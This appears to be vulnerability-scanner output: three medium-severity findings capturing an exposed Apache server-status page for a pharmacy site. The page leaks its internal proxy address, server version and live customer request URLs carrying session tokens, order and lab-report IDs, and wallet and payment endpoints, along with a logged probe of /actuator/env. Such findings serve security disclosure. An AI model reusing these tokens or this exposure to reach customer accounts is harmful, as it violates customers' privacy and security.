23.65.124.43http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337353. 0.00388542230190.00.001852.82 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-17-0/0/338130. 0.0038408522098940.00.001879.66 23.65.124.43http/1.1www.medplusmart.com:443GET /labOrderHistory/printIndividualReport?orderId=2998514&pati 0-17-0/0/337898. 0.0038250519350470.00.001912.22 23.212.50.119http/1.1www.medplusmart.com:443POST /my-profile/getInvoiceItems HTTP/1.1 0-17-0/0/338307. 0.003860508269050.00.001915.58 95.101.181.21http/1.1www.medplusmart.com:443GET /product/rabulcer-20mg-tab_rabu0003 HTTP/1.1 0-17-0/0/338163. 0.003843559127630.00.001894.75 23.61.0.82http/1.1www.medplusmart.com:443GET /product/it-mac-200mg-cap_it_m0001?srsltid=AfmBOooKKuQ61dIh 0-17-0/0/336710. 0.003854657333420.00.001888.45 23.203.63.47http/1.1www.medplusmart.com:443GET /labcatalog/get-subscription-status?tokenId=D713E001DDF2ECF 0-17-0/0/338500. 0.0038123524425670.00.001913.58 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=MENT000 0-17-0/0/337765. 0.003854537102310.00.001917.22 95.101.181.21http/1.1www.medplusmart.com:443GET /product/cefadur-250-rediuse-syp_cefa0011 HTTP/1.1 0-17-0/0/338304. 0.003870514125590.00.001922.05 23.65.124.43http/1.1www.medplusmart.com:443POST /mart-catalog-api/getDiscountForProductsSearch HTTP/1.1 0-17-0/0/337291. 0.003837515699380.00.001876.78 95.101.181.21http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-17-0/0/337109. 0.00381088517901200.00.001878.90 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-checkout/getCartInfo?useComplimentary=true&tokenId=7D 0-17-0/0/337266. 0.00385573273090.00.001939.11 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-common-api/checkAppUpdate?phoneVersion=15&minSdkVersi 0-17-0/0/338103. 0.003837626749470.00.001901.24 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337672. 0.003845517649000.00.001921.33 23.57.76.48http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-17-0/0/337265. 0.0038636524262910.00.001926.46 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-common-api/setLocality?locationInfo=%7B%22pinCode%22: 0-17-0/0/337549. 0.003853515838760.00.001910.52 95.101.181.21http/1.1www.medplusmart.com:443GET /product/clobyte-s-30ml-lotion_clob0085 HTTP/1.1 0-17-0/0/337887. 0.00386518845140.00.001858.42 95.101.181.21http/1.1www.medplusmart.com:443GET /doctors-api/getDoctorsCategories?doctorLatLongVersionKey=& 0-17-0/0/337618. 0.003850511834730.00.001899.53 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/338013. 0.003848512978130.00.001883.50 95.101.181.21http/1.1www.medplusmart.com:443GET /product/mat-q-10-tab_mat_0005 HTTP/1.1 0-17-0/0/337032. 0.0038622517624300.00.001887.04 23.212.50.119http/1.1www.medplusmart.com:443POST /my-profile/getOrderItems HTTP/1.1 0-17-0/0/337307. 0.003864562104880.00.001877.94 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337487. 0.003818515928420.00.001928.18 23.65.124.75http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-17-0/0/337706. 0.0038138529840600.00.001863.87 23.65.124.43http/1.1www.medplusmart.com:443POST /my-profile/getOrderItems HTTP/1.1 0-17-0/0/336588. 0.00388524105570.00.001889.96 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-common-api/getOrderCancellationReasons?orderType=P&to 0-17-0/0/337182. 0.003882522518370.00.001908.58 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337586. 0.003814520746830.00.001861.92 23.212.50.119http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-17-0/0/336822. 0.0038688532804210.00.001850.17 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearchResults?searchCriteria=%7 0-17-0/0/336611. 0.003829538378910.00.001860.37 95.101.181.21http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-17-0/0/336365. 0.0038213585113720.00.001847.41 95.101.181.71http/1.1www.medplusmart.com:443GET /product/cefadur-250-rediuse-syp_cefa0011 HTTP/1.1 0-17-0/0/335892. 0.00384544172000.00.001867.30 23.65.124.75http/1.1www.medplusmart.com:443GET /needHelp/pharmacy/35492901?SESSIONID=C033D546AA91044F75183 0-17-0/0/336627. 0.003813838986930.00.001920.28 23.62.101.38http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-17-0/0/336843. 0.00389519575470.00.001859.09 23.212.50.119http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-17-0/0/336223. 0.0038185668566516470.00.001889.49 23.62.101.22http/1.1www.medplusmart.com:443GET /bot/ HTTP/1.1 0-17-0/0/337849. 0.003865503335170.00.001923.39 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/336327. 0.0038854546165820.00.001904.52 95.101.181.21http/1.1www.medplusmart.com:443GET /manufacturer/REICURI-PVT-LTD HTTP/1.1 0-17-0/0/336889. 0.00389
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0cef362a38e
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Sunday, 26-Oct-2025 13:43:50 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 17 Parent Server MPM Generation: 16 Server uptime: 12 days 17 hours 25 minutes 47 seconds Server load: 0.06 0.04 0.05 Total accesses: 66460921 - Total Traffic: 359.7 GB - Total Duration: 11322697425 CPU Usage: u17.9 s32.9 cu48420 cs24530.6 - 6.64% CPU load 60.4 requests/sec - 343.0 kB/second - 5.7 kB/request - 170.366 ms/request 24 requests currently being processed, 0 workers gracefully restarting, 126 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 0265002no26yes70430191 1265199no35yes120380231 2265302no29yes50450241 Sum3090 2401260663 _____WW____W____W_W_____W________________W___________WR_____WW_W ____W__________W___WW__W_____W_____W_______W____W______________W _______________W_W____.......................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-162650020/76/311855_ 4.07042481757500.00.321751.93 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-162650020/71/312229_ 4.100178490326610.01.271765.78 23.212.50.121http/1.1www.medplusmart.com:443GET /my-profile/downloadPdfFile?fileName=2992786&pdfUrl=https:/ 0-162650020/80/312203_ 4.0906482519370.00.241708.19 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getPopularBrands?tokenId=BFEDCEDFCA9DF02C 0-162650020/73/312127_ 4.1009502363530.00.321690.87 23.50.232.156http/1.1www.medplusmart.com:443GET /storelocator?srsltid=AfmBOopniJYSC4Lx1B6rp7h5PQ47sOxa9nq-4 0-162650020/79/312697_ 4.060222485881480.00.321728.26 2.18.254.180http/1.1www.medplusmart.com:443GET /product/dm-lef-20mg-tab_dm_l0001 HTTP/1.1 0-1626500213/77/312382W 4.0400483435940.00.251765.33 23.57.76.48http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-1626500249/70/312892W 4.0400473303690.00.291764.70 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearchResults?searchCriteria=%7 0-162650020/75/312771_ 4.030308524411320.00.261743.30 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-162650020/83/311517_ 4.10033620606290.00.281737.95 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicSectionProducts?tokenId=BFEDCED 0-162650020/76/313063_ 4.0906486120950.00.271738.35 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/blog/getBlogPostsList?SEARCH_CRITERIA=%7B 0-162650020/75/312469_ 4.120140497985350.00.281766.73 23.203.63.47http/1.1www.medplusmart.com:443POST /my-profile/getOrderItems HTTP/1.1 0-162650023/71/312831W 4.0400474914770.00.241767.04 23.57.76.28http/1.1www.medplusmart.com:443GET /my-profile/getOrderForCustomerReview?tokenId=3AC666ED074F3 0-162650020/65/311794_ 4.05166478485570.00.251732.30 23.212.50.121http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=98E702DE314BD805463FE9 0-162650020/73/311906_ 3.99075480419100.00.281734.59 23.212.50.121http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-162650020/73/312136_ 4.12012522320750.00.291782.21 23.65.124.75http/1.1www.medplusmart.com:443GET /labcatalog/getDiagnosticsCategories?labCatalogVersionNoKey 0-162650020/66/312807_ 4.07019475136470.00.241749.62 104.124.54.78http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-162650026/71/312169W 4.0400482956260.00.311771.59 23.57.76.28http/1.1www.medplusmart.com:443GET /my-profile/getWalletInfo?tokenId=3AC666ED074F3410A0C1B8DCF 0-162650020/70/311927_ 4.0011581489513830.01.501766.14 23.57.76.28http/1.1www.medplusmart.com:443GET /labcatalog/get-top-level-categories?tokenId=3C3F387C4D79D3 0-1626500210/74/312054W 4.0400482047890.01.211754.65 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-checkout/getOrderReviewDetails?tokenId=319450D8571BDF 0-162650020/74/312372_ 4.1206482747950.02.311701.14 23.65.124.75http/1.1www.medplusmart.com:443GET /my-profile/getCustomerLanguages?tokenId=399FD9B0372DD8414C 0-162650020/77/312081_ 4.12043478572140.00.251740.90 23.65.124.75http/1.1www.medplusmart.com:443GET /product/molanza-5mg-tab_mola0026 HTTP/1.1 0-162650020/68/312456_ 4.06067478564630.00.241727.24 23.11.215.85http/1.1www.medplusmart.com:443POST /my-profile/getInvoiceItems HTTP/1.1 0-162650020/71/311487_ 4.12023484472780.00.261744.19 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-162650020/74/311922_ 4.120655526808150.00.251720.59 23.57.76.28http/1.1www.medplusmart.com:443POST /mart-common-api/validateToken HTTP/1.1 0-162650022/71/312171W 4.0400479970130.00.291765.16 23.57.76.48http/1.1www.medplusmart.com:443GET /my-profile/getPromotionTemplateDetails?tokenId=3AC666ED074 0-162650020/70/312212_ 4.05129495624140.00.231718.23 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-checkout/addPatientToShoppingCart HTTP/1.1 0-162650020/73/311212_ 4.05189487667190.00.321728.14 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-162650020/73/312118_ 4.12045474386190.01.221755.82 23.50.232.156http/1.1www.medplusmart.com:443GET /product/HEXASPOR-200MG-CAP_HEXA0042?srsltid=AfmBOoo_JbaNTu 0-162650020/67/312402_ 4.12072475791070.00.281717.81 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-162650020/67/311301_ 4.04062499913020.00.231701.81 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-162650020/75/311356_ 4.06011504242980.01.201726.09 23.212.50.121http/1.1www.medplusmart.com:443GET /doctors-api/getUpcomingConsultations?tokenId=98E702DE314BD 0-162650020/75/310965_ 4.0309550505180.00.251703.38 23.57.76.28http/1.1www.medplusmart.com:443GET /my-profile/getPromotionTemplateDetails?tokenId=2534DA00E92 0-162650020/75/310801_ 4.12061505638350.00.361716.54 23.57.76.48http/1.1www.medplusmart.com:443POST /mart-catalog-api/general/getCategoryProducts HTTP/1.1 0-162650020/73/311348_ 4.00117803169550.00.311772.74 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=CB6150E570BF31 0-162650020/71/311549_ 4.12013484615240.00.301709.99 23.65.124.75http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-162650020/76/311058_ 4.06012529610030.00.261737.68 104.124.54.78http/1.1www.medplusmart.com:443GET /my-profile/getHomeTrackOrderStatusInfo?tokenId=63D129EDEFD 0-162650020/84/312477_ 4.12074468184730.00.301759.05 23.65.124.75http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-162650020/68/311003_ 4.12021489937660.0<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce7a9dd8f7
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Friday, 24-Oct-2025 14:11:36 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 15 Parent Server MPM Generation: 14 Server uptime: 10 days 17 hours 53 minutes 34 seconds Server load: 0.17 0.09 0.02 Total accesses: 55561066 - Total Traffic: 299.7 GB - Total Duration: 9690571620 CPU Usage: u26.52 s33.36 cu40562.3 cs20566.6 - 6.59% CPU load 59.8 requests/sec - 338.5 kB/second - 5.7 kB/request - 174.413 ms/request 10 requests currently being processed, 0 workers gracefully restarting, 140 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 087361yes3no000000 187999no24yes30470211 387871no21yes30470152 488124no35yes40460312 Sum4183 1001400675 ...G..............................................____________W_ _________W____W_____________________............................ ......................_________W_WW_____________________________ ________W________W_____W___________W______________________...... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-14-0/0/256678. 0.0054394399965320.00.001445.33 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getEmergencyMessages?tokenId=0146B5A99101 0-14-0/0/256915. 0.00543682410662390.00.001438.00 23.57.76.48http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=D3121C1F6F76AC651862CD 0-14-0/0/256871. 0.005431069402482100.00.001402.07 23.57.76.28http/1.1www.medplusmart.com:443GET /labcatalog/get-top-level-categories?tokenId=D3121C1F6F76AC 0-14873618/138/256900G 6.856020408843090.00.501382.98 23.65.124.43http/1.1www.medplusmart.com:443GET /bot/ HTTP/1.1 0-14-0/0/257404. 0.0054387409427460.00.001426.80 23.203.63.38http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=96F7AC2F2658628D6BF549 0-14-0/0/257188. 0.00543153405840980.00.001426.18 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=0146B5A991012980C46D3F 0-14-0/0/257324. 0.0054310397276710.00.001442.50 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getRecommendedProducts HTTP/1.1 0-14-0/0/257732. 0.0054399444353880.00.001432.69 23.212.50.119http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=F871EB019E60CB 0-14-0/0/256103. 0.0054381544316560.00.001418.49 23.203.63.38http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-14-0/0/257854. 0.0054318398477640.00.001414.13 23.65.124.75http/1.1www.medplusmart.com:443GET /labCheckout/get-lab-shopping-cart?tokenId=D89905E4A1317F27 0-14-0/0/257365. 0.0054371415636990.00.001438.47 23.203.63.38http/1.1www.medplusmart.com:443GET /my-profile/getPromotionTemplateDetails?tokenId=0146B5A9910 0-14-0/0/257722. 0.00543121390572470.00.001432.44 23.62.101.22http/1.1www.medplusmart.com:443POST /mart-common-api/validateToken HTTP/1.1 0-14-0/0/256873. 0.005432398499470.00.001434.36 23.50.232.156http/1.1www.medplusmart.com:443GET /manifest.json HTTP/1.1 0-14-0/0/256796. 0.00543787401750100.00.001418.27 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/blog/getBlogPostsList?SEARCH_CRITERIA=%7B 0-14-0/0/257223. 0.0054346409563770.00.001457.37 2.18.254.180http/1.1www.medplusmart.com:443GET /product/odonil-1-touch-air-sanitizer-refill-natural-spring 0-14-0/0/257315. 0.0050142566397373130.00.001427.89 23.62.101.38http/1.1www.medplusmart.com:443GET /bot/ HTTP/1.1 0-14-0/0/257152. 0.00543133404579660.00.001450.27 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicSectionProducts?tokenId=0146B5A 0-14-0/0/256961. 0.00543588404547050.00.001438.41 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicSectionProducts?tokenId=D3121C1 0-14-0/0/257009. 0.00543640403030030.00.001441.89 23.57.76.28http/1.1www.medplusmart.com:443POST /labOrderHistory/getLabOrders HTTP/1.1 0-14-0/0/257246. 0.00543161403318780.00.001390.43 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-14-0/0/257187. 0.005431057397949420.00.001415.17 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-checkout/getCartInfo?useComplimentary=true&tokenId=C4 0-14-0/0/257046. 0.005439402424130.00.001406.68 23.203.63.47http/1.1www.medplusmart.com:443GET /doctors-api/catalog/getSortAndFiltersForCatalog?visitType= 0-14-0/0/256280. 0.0054397403538000.00.001417.65 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=0146B5A99101 0-14-0/0/256762. 0.00543119447005730.00.001414.49 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=Q_SE000 0-14-0/0/257088. 0.0054369397480280.00.001464.30 23.203.63.38http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-14-0/0/256918. 0.005435393757340.00.001401.49 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-common-api/checkAppUpdate?phoneVersion=15&minSdkVersi 0-14-0/0/256169. 0.00543167408969030.00.001409.05 104.124.54.78http/1.1www.medplusmart.com:443POST /mart-catalog-api/getPharmacyProducts HTTP/1.1 0-14-0/0/257112. 0.0054312395572490.00.001430.17 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=D89905E4A1317F 0-14-0/0/257148. 0.00543173398907020.00.001403.43 2.18.254.180http/1.1www.medplusmart.com:443GET /product/d3-film-rapid-filims-sachet_d3_f0001 HTTP/1.1 0-14-0/0/256668. 0.0054311403073490.00.001396.49 23.65.124.43http/1.1www.medplusmart.com:443GET /labcatalog/getHeaderInfo?testName=&tokenId=D89905E4A1317F2 0-14-0/0/256114. 0.00543623424718370.00.001427.23 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-14-0/0/255914. 0.0054389472692450.00.001395.56 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getPopularBrands?tokenId=0146B5A991012980 0-14-0/0/255871. 0.005431492422684790.00.001402.50 23.203.63.38http/1.1www.medplusmart.com:443GET /labcatalog/get-top-level-categories?tokenId=0EF48D5B572819 0-14-0/0/256139. 0.0053032830723748190.00.001466.09 23.212.50.121http/1.1www.medplusmart.com:443GET /bot/ HTTP/1.1 0-14-0/0/256551. 0.00543682400507340.00.001391.83 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-14-0/0/256029. 0.00543623443778370.00.001430.35 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=D3121C1F6F76 0-14-0/0/257176. 0.00543148386580770.00.001441.89 23.61.0.82http/1.1www.medplusmart.com:443GET /mart-catalog-api/product/getProductAvailableNearByStores?p 0-14-0/0/256069. 0.005435400640570.00.001427.24 23.62.101.22http/1.1www.medplusmart.com:443GET /mart-catalog-api/getC
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce6c843a4b
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Monday, 20-Oct-2025 12:42:01 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 11 Parent Server MPM Generation: 10 Server uptime: 6 days 16 hours 23 minutes 59 seconds Server load: 0.03 0.06 0.01 Total accesses: 34734784 - Total Traffic: 190.7 GB - Total Duration: 6435607502 CPU Usage: u21.48 s23.49 cu25473.2 cs12843.9 - 6.64% CPU load 60.2 requests/sec - 346.4 kB/second - 5.8 kB/request - 185.278 ms/request 6 requests currently being processed, 0 workers gracefully restarting, 144 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 03918000no25yes20480241 13917466yes1no000000 33917738no26yes10490222 43917844no38yes30470313 Sum4190 601440776 _______WW_________________________________________...G.......... ................................................................ ......................________________________W_________________ _________W______________________________________W_W_______...... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1039180000/5/167234_ 0.220112262454160.00.02963.67 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=OILA000 0-1039180000/5/167800_ 0.222199256836190.00.03962.60 95.101.181.71http/1.1www.medplusmart.com:443GET /product/fortwin-inj_fort0002 HTTP/1.1 0-1039180000/5/167253_ 0.221104264637340.00.03956.51 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=0414C57CBCF3AA 0-1039180000/5/167234_ 0.22053274139840.00.02932.09 23.50.232.156http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-1039180000/4/167926_ 0.22092261073690.00.03938.32 23.212.50.119http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCompositionProductDetails HTTP/1.1 0-1039180000/5/167639_ 0.22099267155920.00.01950.89 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=MEDI036 0-1039180000/4/167384_ 0.221787261769590.00.01962.02 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-checkout/getCartInfo?useComplimentary=true&tokenId=8E 0-10391800019/5/167737W 0.2200311297290.00.04959.27 95.101.181.71http/1.1www.medplusmart.com:443GET /server-status HTTP/1.1 0-1039180004/5/166795W 0.2200398463120.00.01945.21 23.57.76.18http/1.1www.medplusmart.com:443POST /my-profile/getOrderItems HTTP/1.1 0-1039180000/5/167988_ 0.220106265654040.00.03939.91 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-1039180000/5/167562_ 0.220380282660600.00.02958.93 23.11.215.79http/1.1www.medplusmart.com:443POST /mart-checkout/v1/secure/payment/processPayment?tokenId=E1 0-1039180000/5/167835_ 0.25066255466920.00.01956.79 23.11.215.79http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-1039180000/5/167118_ 0.250115265022110.00.02949.75 23.57.76.18http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=DEPR001 0-1039180000/4/167188_ 0.23122262247720.00.01931.57 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getWalletInfo?tokenId=9BFFC7D488D38B10B417E7217 0-1039180000/4/167600_ 0.22219258875030.00.01963.14 23.11.215.79http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-1039180000/4/167300_ 0.22114266078150.00.02955.47 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-common-api/validateToken HTTP/1.1 0-1039180000/2/167579_ 0.13147269741580.00.01972.30 23.50.232.156http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicSectionProducts?tokenId=4D8D1E0 0-1039180000/3/167131_ 0.17112266787870.00.01968.01 23.212.50.119http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-1039180000/5/167102_ 0.23111265684330.00.01967.65 23.212.50.119http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=537EF158AB2F 0-1039180000/3/167502_ 0.221130257196770.00.01941.13 23.203.63.47http/1.1www.medplusmart.com:443GET /labcatalog/get-top-level-categories?tokenId=9BFFC7D488D38B 0-1039180000/4/167485_ 0.23192257404770.00.02960.32 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-1039180000/4/167135_ 0.2312272215130.00.01933.67 23.11.215.85http/1.1www.medplusmart.com:443GET /manifest.json HTTP/1.1 0-1039180000/4/166692_ 0.25025268315710.00.01923.86 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-1039180000/5/167080_ 0.23147285038110.00.02936.27 95.101.181.71http/1.1www.medplusmart.com:443GET /product/argigold-f-cap_argi0049 HTTP/1.1 0-1039180000/5/167385_ 0.23113261692260.00.03970.70 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-checkout/getOrderType?cartId=31703390&tokenId=E10DFD2 0-1039180000/5/167436_ 0.25045260477680.00.03929.41 23.50.232.156http/1.1www.medplusmart.com:443GET /product/dosi-flow-1-regulator-iv_dosi0003?srsltid=AfmBOopd 0-1039180000/4/167049_ 0.23117263376080.00.02952.73 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=9BFFC7D488D38B 0-1039180000/3/167277_ 0.200288261306100.00.03978.95 95.101.181.71http/1.1www.medplusmart.com:443GET /product/dermadew-acne-75gm-soap_derm0025 HTTP/1.1 0-1039180000/4/167443_ 0.23127263474960.00.02921.63 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getWalletInfo?tokenId=9BFFC7D488D38B10B417E7217 0-1039180000/5/166987_ 0.2318261166050.00.02928.52 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getRetryPaymentInfoForCustomer?tokenId=9BFFC7D4 0-1039180000/4/166745_ 0.2317286195000.00.01944.90 23.212.50.121http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-1039180000/5/166305_ 0.24017301846490.00.02928.73 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=A4166E9D0D9CDA 0-1039180000/5/166547_ 0.2508263655270.00.02933.25 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=A4166E9D0D9C 0-1039180000/4/166859_ 0.20021311106910.00.01985.48 23.212.50.119http/1.1www.medplusmart.com:443POST /my-profile/getPaymentDetails HTTP/1.1 0-1039180000/5/166917_ 0.25072270786240.00.02925.24 23.65.124.43http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=A3A6D54EA5E9D9C90BD358 0-1039180000/5/166483_ 0.2507311667130.00.02952.41 95.101.181.71http/1.1www.medplusmart.com:443GET /actuator/env HTTP/1.1 0-1039180000/4/167464_ 0.20022256249030.00.01979.32 23.57.76.18http/1.1www.medplusmart.com:443GET /my-profile/getWalletInfo?tokenId=5795514BAC2875CD873693FC6 